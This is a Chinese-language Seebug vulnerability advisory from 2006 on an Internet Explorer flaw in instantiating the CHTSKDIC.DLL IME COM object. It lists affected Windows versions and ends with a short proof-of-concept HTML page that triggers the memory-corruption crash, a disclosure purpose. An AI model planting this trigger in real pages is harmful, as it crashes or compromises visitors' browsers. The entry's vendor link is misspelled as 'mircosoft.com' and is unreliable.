Microsoft Internet Explorer CHTSKDIC.DLL拒绝服务漏洞

2006-12-10T00:00:00
ID SSV:806
Type seebug
Reporter Root
Modified 2006-12-10T00:00:00

Description

Microsoft Internet Explorer是一款流行的WEB浏览器。 Microsoft Internet Explorer实例化CHTSKDIC.DLL COM对象存在问题,远程攻击者可以利用漏洞进行内存破坏攻击,可能以进程权限执行任意指令。 当Microsoft Internet Explorer尝试以ActiveX控件实例化CHTSKDIC.DLL(Microsoft IME) COM对象,可能破坏系统内存造成拒绝服务,可能导致任意代码执行。

Microsoft Internet Explorer 6.0 SP2 Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 - Microsoft Windows 2000 Advanced Server SP2 - Microsoft Windows 2000 Advanced Server SP2 - Microsoft Windows 2000 Advanced Server SP1 - Microsoft Windows 2000 Advanced Server SP1 - Microsoft Windows 2000 Advanced Server - Microsoft Windows 2000 Advanced Server - Microsoft Windows 2000 Datacenter Server SP2 - Microsoft Windows 2000 Datacenter Server SP2 - Microsoft Windows 2000 Datacenter Server SP1 - Microsoft Windows 2000 Datacenter Server SP1 - Microsoft Windows 2000 Datacenter Server - Microsoft Windows 2000 Datacenter Server - Microsoft Windows 2000 Professional SP2 - Microsoft Windows 2000 Professional SP2 - Microsoft Windows 2000 Professional SP1 - Microsoft Windows 2000 Professional SP1 - Microsoft Windows 2000 Professional - Microsoft Windows 2000 Professional - Microsoft Windows 2000 Server SP2 - Microsoft Windows 2000 Server SP2 - Microsoft Windows 2000 Server SP1 - Microsoft Windows 2000 Server SP1 - Microsoft Windows 2000 Server - Microsoft Windows 2000 Server - Microsoft Windows 2000 Terminal Services SP2 - Microsoft Windows 2000 Terminal Services SP2 - Microsoft Windows 2000 Terminal Services SP1 - Microsoft Windows 2000 Terminal Services SP1 - Microsoft Windows 2000 Terminal Services - Microsoft Windows 2000 Terminal Services - Microsoft Windows 98 - Microsoft Windows 98 - Microsoft Windows 98SE - Microsoft Windows 98SE - Microsoft Windows ME - Microsoft Windows ME - Microsoft Windows NT 4.0 SP6a - Microsoft Windows NT Enterprise Server 4.0 SP6a - Microsoft Windows NT Enterprise Server 4.0 SP6a - Microsoft Windows NT Server 4.0 SP6a - Microsoft Windows NT Server 4.0 SP6a - Microsoft Windows NT Workstation 4.0 SP6a - Microsoft Windows NT Workstation 4.0 SP6a + Microsoft Windows Server 2003 Datacenter Edition + Microsoft Windows Server 2003 Datacenter Edition + Microsoft Windows Server 2003 Datacenter Edition Itanium 0 + Microsoft Windows Server 2003 Datacenter Edition Itanium 0 + Microsoft Windows Server 2003 Enterprise Edition + Microsoft Windows Server 2003 Enterprise Edition + Microsoft Windows Server 2003 Enterprise Edition Itanium 0 + Microsoft Windows Server 2003 Enterprise Edition Itanium 0 + Microsoft Windows Server 2003 Standard Edition + Microsoft Windows Server 2003 Standard Edition + Microsoft Windows Server 2003 Web Edition + Microsoft Windows Server 2003 Web Edition + Microsoft Windows XP Home + Microsoft Windows XP Home + Microsoft Windows XP Professional + Microsoft Windows XP Professional <a href="http://www.mircosoft.com/" target="_blank">http://www.mircosoft.com/</a>

                                        
                                            
                                                =============== CHTSKDIC.DLL.htm start ================

&lt;!--
// Internet Explorer (CHTSKDIC.DLL) COM Object Instantiation Vulnerability
// tested XP SP2 CN

// http://www.xsec.org
// nop (nop#xsec.org)

// CLSID: {BE4191FB-59EF-4825-AEFC-109727951E42}
// Info: ImeSingleKanjiDict// ProgID: ID2
// InprocServer32: C:/WINDOWS/IME/CHTIME/APPLETS/CHTSKDIC.DLL

!--&gt;

&lt;html&gt;&lt;body&gt;
&lt;object classid=&quot;CLSID:{BE4191FB-59EF-4825-AEFC-109727951E42}&quot; &gt;&lt;/object&gt;
&lt;/body&gt;&lt;/html&gt;

=============== CHTSKDIC.DLL.htm end ==================